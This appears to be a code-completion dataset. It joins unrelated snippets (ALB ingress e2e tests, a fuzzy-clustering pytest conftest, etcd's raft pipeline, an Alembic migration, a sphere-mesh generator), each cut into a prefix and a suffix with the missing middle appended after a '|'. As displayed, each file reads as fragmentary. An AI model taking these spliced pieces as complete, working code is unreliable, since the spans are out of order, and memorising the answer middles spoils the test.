err := tf.NSManager.WaitUntilNamespaceDeleted(ctx, sandboxNS)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("namespace becomes deleted", "name", sandboxNS.Name)
}
})
}
})
Context("with basic settings", func() {
It("[ingress-class] with IngressClass configured with 'ingress.k8s.aws/alb' controller, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ingClass := &networking.IngressClass{
ObjectMeta: metav1.ObjectMeta{
Name: sandboxNS.Name,
},
Spec: networking.IngressClassSpec{
Controller: "ingress.k8s.aws/alb",
},
}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithIngressClassName(ingClass.Name).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ingClass, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
It("with 'kubernetes.io/ingress.class' annotation set to 'alb', one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with IngressClass variant settings", func() {
It("[ingress-class] with IngressClass configured with 'nginx' controller, no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ingClass := &networking.IngressClass{
ObjectMeta: metav1.ObjectMeta{
Name: sandboxNS.Name,
},
Spec: networking.IngressClassSpec{
Controller: "kubernetes.io/nginx",
},
}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithIngressClassName(ingClass.Name).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ingClass, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
It("with 'kubernetes.io/ingress.class' annotation set to 'nginx', no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "nginx",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
It("without IngressClass or 'kubernetes.io/ingress.class' annotation, no ALB shall be created", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"alb.ingress.kubernetes.io/scheme": "internet-facing",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
ExpectNoLBProvisionedForIngress(ctx, tf, ing)
})
})
Context("with `alb.ingress.kubernetes.io/load-balancer-name` variant settings", func() {
It("with 'alb.ingress.kubernetes.io/load-balancer-name' annotation explicitly specified, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
lbName := fmt.Sprintf("%.16s-%.15s", tf.Options.ClusterName, sandboxNS.Name)
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/load-balancer-name": lbName,
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
sdkLB, err := tf.LBManager.GetLoadBalancerFromARN(ctx, lbARN)
Expect(err).NotTo(HaveOccurred())
Expect(awssdk.StringValue(sdkLB.LoadBalancerName)).Should(Equal(lbName))
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with ALB IP targets and named target port", func() {
It("with 'alb.ingress.kubernetes.io/target-type' annotation explicitly specified, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder().WithTargetPortName("e2e-targetport")
ingBuilder := manifest.NewIngressBuilder()
dp, svc := appBuilder.Build(sandboxNS.Name, "app")
ingBackend := networking.IngressBackend{ServiceName: svc.Name, ServicePort: intstr.FromInt(80)}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/path", Backend: ingBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/target-type": "ip",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp, svc, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path").Expect().
Status(http.StatusOK).
Body().Equal("Hello World!")
})
})
Context("with `alb.ingress.kubernetes.io/actions.${action-name}` variant settings", func() {
It("with annotation based actions, one ALB shall be created and functional", func() {
appBuilder := manifest.NewFixedResponseServiceBuilder()
ingBuilder := manifest.NewIngressBuilder()
dp1, svc1 := appBuilder.WithHTTPBody("app-1").Build(sandboxNS.Name, "app-1")
dp2, svc2 := appBuilder.WithHTTPBody("app-2").Build(sandboxNS.Name, "app-2")
ingResponse503Backend := networking.IngressBackend{ServiceName: "response-503", ServicePort: intstr.FromString("use-annotation")}
ingRedirectToAWSBackend := networking.IngressBackend{ServiceName: "redirect-to-aws", ServicePort: intstr.FromString("use-annotation")}
ingForwardSingleTGBackend := networking.IngressBackend{ServiceName: "forward-single-tg", ServicePort: intstr.FromString("use-annotation")}
ingForwardMultipleTGBackend := networking.IngressBackend{ServiceName: "forward-multiple-tg", ServicePort: intstr.FromString("use-annotation")}
ing := ingBuilder.
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/response-503", Backend: ingResponse503Backend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/redirect-to-aws", Backend: ingRedirectToAWSBackend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/forward-single-tg", Backend: ingForwardSingleTGBackend}).
AddHTTPRoute("", networking.HTTPIngressPath{Path: "/forward-multiple-tg", Backend: ingForwardMultipleTGBackend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/actions.response-503": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"503\",\"messageBody\":\"503 error text\"}}",
"alb.ingress.kubernetes.io/actions.redirect-to-aws": "{\"type\":\"redirect\",\"redirectConfig\":{\"host\":\"aws.amazon.com\",\"path\":\"/eks/\",\"port\":\"443\",\"protocol\":\"HTTPS\",\"query\":\"k=v\",\"statusCode\":\"HTTP_302\"}}",
"alb.ingress.kubernetes.io/actions.forward-single-tg": "{\"type\":\"forward\",\"forwardConfig\":{\"targetGroups\":[{\"serviceName\":\"app-1\",\"servicePort\":\"80\"}]}}",
"alb.ingress.kubernetes.io/actions.forward-multiple-tg": "{\"type\":\"forward\",\"forwardConfig\":{\"targetGroups\":[{\"serviceName\":\"app-1\",\"servicePort\":\"80\",\"weight\":20},{\"serviceName\":\"app-2\",\"servicePort\":80,\"weight\":80}],\"targetGroupStickinessConfig\":{\"enabled\":true,\"durationSeconds\":200}}}",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, dp1, svc1, dp2, svc2, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/response-503").Expect().
Status(http.StatusServiceUnavailable).
Body().Equal("503 error text")
httpExp.GET("/redirect-to-aws").WithRedirectPolicy(httpexpect.DontFollowRedirects).Expect().
Status(http.StatusFound).
Header("Location").Equal("https://aws.amazon.com:443/eks/?k=v")
httpExp.GET("/forward-single-tg").Expect().
Status(http.StatusOK).
Body().Equal("app-1")
httpExp.GET("/forward-multiple-tg").Expect().
Status(http.StatusOK).
Body().Match("app-1|app-2")
})
})
Context("with `alb.ingress.kubernetes.io/conditions.${conditions-name}` variant settings", func() {
It("with annotation based conditions, one ALB shall be created and functional", func() {
ingBuilder := manifest.NewIngressBuilder()
ingRulePath1Backend := networking.IngressBackend{ServiceName: "rule-path1", ServicePort: intstr.FromString("use-annotation")}
ingRulePath2Backend := networking.IngressBackend{ServiceName: "rule-path2", ServicePort: intstr.FromString("use-annotation")}
ingRulePath3Backend := networking.IngressBackend{ServiceName: "rule-path3", ServicePort: intstr.FromString("use-annotation")}
ingRulePath4Backend := networking.IngressBackend{ServiceName: "rule-path4", ServicePort: intstr.FromString("use-annotation")}
ingRulePath5Backend := networking.IngressBackend{ServiceName: "rule-path5", ServicePort: intstr.FromString("use-annotation")}
ingRulePath6Backend := networking.IngressBackend{ServiceName: "rule-path6", ServicePort: intstr.FromString("use-annotation")}
ingRulePath7Backend := networking.IngressBackend{ServiceName: "rule-path7", ServicePort: intstr.FromString("use-annotation")}
ing := ingBuilder.
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path1", Backend: ingRulePath1Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path2", Backend: ingRulePath2Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path3", Backend: ingRulePath3Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path4", Backend: ingRulePath4Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path5", Backend: ingRulePath5Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path6", Backend: ingRulePath6Backend}).
AddHTTPRoute("www.example.com", networking.HTTPIngressPath{Path: "/path7", Backend: ingRulePath7Backend}).
WithAnnotations(map[string]string{
"kubernetes.io/ingress.class": "alb",
"alb.ingress.kubernetes.io/scheme": "internet-facing",
"alb.ingress.kubernetes.io/actions.rule-path1": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Host is www.example.com OR anno.example.com\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path1": "[{\"field\":\"host-header\",\"hostHeaderConfig\":{\"values\":[\"anno.example.com\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path2": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Path is /path2 OR /anno/path2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path2": "[{\"field\":\"path-pattern\",\"pathPatternConfig\":{\"values\":[\"/anno/path2\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path3": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Http header HeaderName is HeaderValue1 OR HeaderValue2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path3": "[{\"field\":\"http-header\",\"httpHeaderConfig\":{\"httpHeaderName\": \"HeaderName\", \"values\":[\"HeaderValue1\", \"HeaderValue2\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path4": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Http request method is GET OR HEAD\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path4": "[{\"field\":\"http-request-method\",\"httpRequestMethodConfig\":{\"Values\":[\"GET\", \"HEAD\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path5": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Query string is paramA:valueA1 OR paramA:valueA2\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path5": "[{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramA\",\"value\":\"valueA1\"},{\"key\":\"paramA\",\"value\":\"valueA2\"}]}}]",
"alb.ingress.kubernetes.io/actions.rule-path6": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"Source IP is 192.168.0.0/16 OR 172.16.0.0/16\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path6": "[{\"field\":\"source-ip\",\"sourceIpConfig\":{\"values\":[\"192.168.0.0/16\", \"172.16.0.0/16\"]}}]",
"alb.ingress.kubernetes.io/actions.rule-path7": "{\"type\":\"fixed-response\",\"fixedResponseConfig\":{\"contentType\":\"text/plain\",\"statusCode\":\"200\",\"messageBody\":\"multiple conditions applies\"}}",
"alb.ingress.kubernetes.io/conditions.rule-path7": "[{\"field\":\"http-header\",\"httpHeaderConfig\":{\"httpHeaderName\": \"HeaderName\", \"values\":[\"HeaderValue\"]}},{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramA\",\"value\":\"valueA\"}]}},{\"field\":\"query-string\",\"queryStringConfig\":{\"values\":[{\"key\":\"paramB\",\"value\":\"valueB\"}]}}]",
}).Build(sandboxNS.Name, "ing")
resStack := fixture.NewK8SResourceStack(tf, ing)
resStack.Setup(ctx)
defer resStack.TearDown(ctx)
lbARN, lbDNS := ExpectOneLBProvisionedForIngress(ctx, tf, ing)
// test traffic
ExpectLBDNSBeAvailable(ctx, tf, lbARN, lbDNS)
httpExp := httpexpect.New(tf.Logger, fmt.Sprintf("http://%v", lbDNS))
httpExp.GET("/path1").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Host is www.example.com OR anno.example.com")
httpExp.GET("/path1").WithHost("anno.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Host is www.example.com OR anno.example.com")
httpExp.GET("/path1").WithHost("other.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path2").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Path is /path2 OR /anno/path2")
httpExp.GET("/anno/path2").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Path is /path2 OR /anno/path2")
httpExp.GET("/other/path2").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue1").Expect().
Status(http.StatusOK).
Body().Equal("Http header HeaderName is HeaderValue1 OR HeaderValue2")
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue2").Expect().
Status(http.StatusOK).
Body().Equal("Http header HeaderName is HeaderValue1 OR HeaderValue2")
httpExp.GET("/path3").WithHost("www.example.com").WithHeader("HeaderName", "HeaderValue3").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path3").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path4").WithHost("www.example.com").Expect().
Status(http.StatusOK).
Body().Equal("Http request method is GET OR HEAD")
httpExp.HEAD("/path4").WithHost("www.example.com").Expect().
Status(http.StatusOK)
httpExp.POST("/path4").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA1").Expect().
Status(http.StatusOK).
Body().Equal("Query string is paramA:valueA1 OR paramA:valueA2")
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA2").Expect().
Status(http.StatusOK).
Body().Equal("Query string is paramA:valueA1 OR paramA:valueA2")
httpExp.GET("/path5").WithHost("www.example.com").WithQuery("paramA", "valueA3").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path6").WithHost("www.example.com").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "HeaderValue").
WithQuery("paramA", "valueA").WithQuery("paramB", "valueB").Expect().
Status(http.StatusOK).
Body().Equal("multiple conditions applies")
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "OtherHeaderValue").
WithQuery("paramA", "valueA").WithQuery("paramB", "valueB").Expect().
Status(http.StatusNotFound)
httpExp.GET("/path7").WithHost("www.example.com").
WithHeader("HeaderName", "HeaderValue").
WithQuery("paramA", "valueB").WithQuery("paramB", "valueB").Expect().
Status(http.StatusNotFound)
})
})
})
// ExpectOneLBProvisionedForIngress expects one LoadBalancer provisioned for Ingress.
func ExpectOneLBProvisionedForIngress(ctx context.Context, tf *framework.Framework, ing *networking.Ingress) (lbARN string, lbDNS string) {
Eventually(func(g Gomega) {
err := tf.K8sClient.Get(ctx, k8s.NamespacedName(ing), ing)
g.Expect(err).NotTo(HaveOccurred())
lbDNS = FindIngressDNSName(ing)
g.Expect(lbDNS).ShouldNot(BeEmpty())
}, utils.IngressReconcileTimeout, utils.PollIntervalShort).Should(Succeed())
tf.Logger.Info("ingress DNS populated", "dnsName", lbDNS)
var err error
lbARN, err = tf.LBManager.FindLoadBalancerByDNSName(ctx, lbDNS)
Expect(err).ShouldNot(HaveOccurred())
tf.Logger.Info("ALB provisioned", "arn", lbARN)
return lbARN, lbDNS
}
// ExpectNoLBProvisionedForIngress expects no LoadBalancer provisioned for Ingress.
func ExpectNoLBProvisionedForIngress(ctx context.Context, tf *framework.Framework, ing *networking.Ingress) {
Consistently(func(g Gomega) {
err := tf.K8sClient.Get(ctx, k8s.NamespacedName(ing), ing)
g.Expect(err).NotTo(HaveOccurred())
lbDNS := FindIngressDNSName(ing)
g.Expect(lbDNS).Should(BeEmpty())
}, utils.IngressReconcileTimeout, utils.PollIntervalShort).Should(Succeed())
}
func | (ctx context.Context, tf *framework.Framework, lbARN string, lbDNS string) {
ctx, cancel := context.WithTimeout(ctx, utils.IngressDNSAvailableWaitTimeout)
defer cancel()
tf.Logger.Info("wait loadBalancer becomes available", "arn", lbARN)
err := tf.LBManager.WaitUntilLoadBalancerAvailable(ctx, lbARN)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("loadBalancer becomes available", "arn", lbARN)
tf.Logger.Info("wait dns becomes available", "dns", lbDNS)
err = utils.WaitUntilDNSNameAvailable(ctx, lbDNS)
Expect(err).NotTo(HaveOccurred())
tf.Logger.Info("dns becomes available", "dns", lbDNS)
}
| ExpectLBDNSBeAvailable |
conftest.py | import pytest
import random
import numpy as np
from numpy.random import rand
import lib.algorithms as al
@pytest.fixture(scope="session")
def unif_1D():
"""
Test case: one dimension, samples evenly distributed.
"""
data = np.array([[0], [1], [2], [3], [4], [5], [6],
[7], [8], [9], [10], [11], [12]
]
)
return data
@pytest.fixture(scope="session")
def rng():
return random.Random()
@pytest.fixture
def dataset(rng):
n_samples = rng.randint(100, 1000)
n_features = rng.randint(10, 100)
feature_range = rng.randint(1, 10)
return (rand(n_samples, n_features) - 1/2) * feature_range
|
@pytest.fixture
def FC_random(rng, dataset, nc):
p = 1 + rng.random() * 2
return al.FuzzyClustering(dataset, p, nc)
# @pytest.fixture
# def FCP_random(rng, dataset, nc):
# p = rng.random()
# return al.FuzzyClusteringPoly(dataset, p, nc)
# @pytest.fixture
# def FCRS_random(rng, dataset, nc):
# p = rng.random() * 5
# return al.FuzzyClusteringRegulSh(dataset, p, nc)
# @pytest.fixture
# def FCRQ_random(rng, dataset, nc):
# p = rng.random() * 5
# return al.FuzzyClusteringRegulQuad(dataset, p, nc) | @pytest.fixture
def nc(rng):
return rng.randint(2, 50) |
pipeline.go | // Copyright 2015 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package rafthttp
import (
"bytes"
"errors"
"io/ioutil"
"sync"
"time"
"github.com/coreos/etcd/etcdserver/stats"
"github.com/coreos/etcd/pkg/httputil"
"github.com/coreos/etcd/pkg/pbutil"
"github.com/coreos/etcd/pkg/types"
"github.com/coreos/etcd/raft"
"github.com/coreos/etcd/raft/raftpb"
)
const (
connPerPipeline = 4
// pipelineBufSize is the size of pipeline buffer, which helps hold the
// temporary network latency.
// The size ensures that pipeline does not drop messages when the network
// is out of work for less than 1 second in good path.
pipelineBufSize = 64
)
var errStopped = errors.New("stopped")
type pipeline struct {
from, to types.ID
cid types.ID
tr *Transport
picker *urlPicker
status *peerStatus
fs *stats.FollowerStats
r Raft
errorc chan error
msgc chan raftpb.Message
// wait for the handling routines
wg sync.WaitGroup
stopc chan struct{}
}
func newPipeline(tr *Transport, picker *urlPicker, from, to, cid types.ID, status *peerStatus, fs *stats.FollowerStats, r Raft, errorc chan error) *pipeline {
p := &pipeline{
from: from,
to: to,
cid: cid,
tr: tr,
picker: picker,
status: status,
fs: fs,
r: r,
errorc: errorc,
stopc: make(chan struct{}),
msgc: make(chan raftpb.Message, pipelineBufSize),
}
p.wg.Add(connPerPipeline)
for i := 0; i < connPerPipeline; i++ {
go p.handle()
}
return p
}
func (p *pipeline) stop() {
close(p.stopc)
p.wg.Wait()
}
func (p *pipeline) handle() {
defer p.wg.Done()
for {
select {
case m := <-p.msgc:
start := time.Now()
err := p.post(pbutil.MustMarshal(&m))
end := time.Now()
if err != nil {
p.status.deactivate(failureType{source: pipelineMsg, action: "write"}, err.Error())
if m.Type == raftpb.MsgApp && p.fs != nil {
p.fs.Fail()
}
p.r.ReportUnreachable(m.To)
if isMsgSnap(m) { | }
continue
}
p.status.activate()
if m.Type == raftpb.MsgApp && p.fs != nil {
p.fs.Succ(end.Sub(start))
}
if isMsgSnap(m) {
p.r.ReportSnapshot(m.To, raft.SnapshotFinish)
}
sentBytes.WithLabelValues(types.ID(m.To).String()).Add(float64(m.Size()))
case <-p.stopc:
return
}
}
}
// post POSTs a data payload to a url. Returns nil if the POST succeeds,
// error on any failure.
func (p *pipeline) post(data []byte) (err error) {
u := p.picker.pick()
req := createPostRequest(u, RaftPrefix, bytes.NewBuffer(data), "application/protobuf", p.tr.URLs, p.from, p.cid)
done := make(chan struct{}, 1)
cancel := httputil.RequestCanceler(p.tr.pipelineRt, req)
go func() {
select {
case <-done:
case <-p.stopc:
waitSchedule()
cancel()
}
}()
resp, err := p.tr.pipelineRt.RoundTrip(req)
done <- struct{}{}
if err != nil {
p.picker.unreachable(u)
return err
}
b, err := ioutil.ReadAll(resp.Body)
if err != nil {
p.picker.unreachable(u)
return err
}
resp.Body.Close()
err = checkPostResponse(resp, b, req, p.to)
if err != nil {
p.picker.unreachable(u)
// errMemberRemoved is a critical error since a removed member should
// always be stopped. So we use reportCriticalError to report it to errorc.
if err == errMemberRemoved {
reportCriticalError(err, p.errorc)
}
return err
}
return nil
}
// waitSchedule waits other goroutines to be scheduled for a while
func waitSchedule() { time.Sleep(time.Millisecond) } | p.r.ReportSnapshot(m.To, raft.SnapshotFailure) |
156b555e16b7_.py | """empty message
Revision ID: 156b555e16b7
Revises: fc1cedce5988
Create Date: 2020-05-04 10:39:56.803842
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '156b555e16b7'
down_revision = 'fc1cedce5988'
branch_labels = None
depends_on = None
def | ():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('posts', 'author',
existing_type=sa.VARCHAR(length=128),
nullable=False)
op.alter_column('posts', 'description',
existing_type=sa.VARCHAR(length=256),
nullable=False)
op.alter_column('posts', 'title',
existing_type=sa.VARCHAR(length=128),
nullable=False)
op.drop_index('ix_posts_timestamp', table_name='posts')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index('ix_posts_timestamp', 'posts', ['timestamp'], unique=False)
op.alter_column('posts', 'title',
existing_type=sa.VARCHAR(length=128),
nullable=True)
op.alter_column('posts', 'description',
existing_type=sa.VARCHAR(length=256),
nullable=True)
op.alter_column('posts', 'author',
existing_type=sa.VARCHAR(length=128),
nullable=True)
# ### end Alembic commands ###
| upgrade |
sphere.go | package geometry
import (
"github.com/dlespiau/dax"
"github.com/dlespiau/dax/math"
)
type Sphere struct {
radius float32
nVSegments, nHSegments int
phiStart, phiLength float32
thetaStart, thetaLength float32
}
func NewSphere(radius float32, nVSegments, nHSegments int) *Sphere {
s := new(Sphere)
s.Init(radius, nVSegments, nHSegments)
return s
}
func (s *Sphere) InitFull(radius float32, nVSegments, nHSegments int,
phiStart, phiLength, thetaStart, thetaLength float32) {
s.radius = radius
s.nVSegments = nVSegments
s.nHSegments = nHSegments
s.phiStart = phiStart
s.phiLength = phiLength
s.thetaStart = thetaStart
s.thetaLength = thetaLength
}
func (s *Sphere) Init(radius float32, nVSegments, nHSegments int) {
const angle float32 = 2 * float32(math.Pi)
s.InitFull(radius, nVSegments, nHSegments, 0, angle, 0, angle)
}
func (s *Sphere) GetMesh() *dax.Mesh {
m := dax.NewMesh()
var positions, normals, uvs dax.AttributeBuffer
thetaEnd := s.thetaStart + s.thetaLength
vertexCount := (s.nVSegments + 1) * (s.nHSegments + 1)
positions.Init("position", vertexCount, 3)
normals.Init("normal", vertexCount, 3)
uvs.Init("uvs", vertexCount, 2)
index := 0
vertices := make([][]uint, s.nHSegments+1, s.nHSegments+1)
normal := math.Vec3{}
for y := 0; y <= s.nHSegments; y++ {
verticesRow := make([]uint, s.nVSegments+1, s.nVSegments+1)
v := float32(y) / float32(s.nHSegments)
for x := 0; x <= s.nVSegments; x++ {
u := float32(x) / float32(s.nVSegments)
px := -s.radius * math.Cos(s.phiStart+u*s.phiLength) * math.Sin(s.thetaStart+v*s.thetaLength)
py := s.radius * math.Cos(s.thetaStart+v*s.thetaLength)
pz := s.radius * math.Sin(s.phiStart+u*s.phiLength) * math.Sin(s.thetaStart+v*s.thetaLength)
| positions.SetXYZ(index, px, py, pz)
normals.SetXYZ(index, normal[0], normal[1], normal[2])
uvs.SetXY(index, u, 1-v)
verticesRow[x] = uint(index)
index++
}
vertices[y] = verticesRow
}
indices := make([]uint, vertexCount, vertexCount)
i := 0
for y := 0; y < s.nHSegments; y++ {
for x := 0; x < s.nVSegments; x++ {
v1 := vertices[y][x+1]
v2 := vertices[y][x]
v3 := vertices[y+1][x]
v4 := vertices[y+1][x+1]
if y != 0 || s.thetaStart > 0 {
indices[i] = v1
i++
indices[i] = v2
i++
indices[i] = v4
i++
}
if y != s.nHSegments-1 || thetaEnd < math.Pi {
indices[i] = v2
i++
indices[i] = v3
i++
indices[i] = v4
i++
}
}
}
m.AddIndices(indices)
m.AddAttributeBuffer(&positions)
m.AddAttributeBuffer(&normals)
m.AddAttributeBuffer(&uvs)
return m
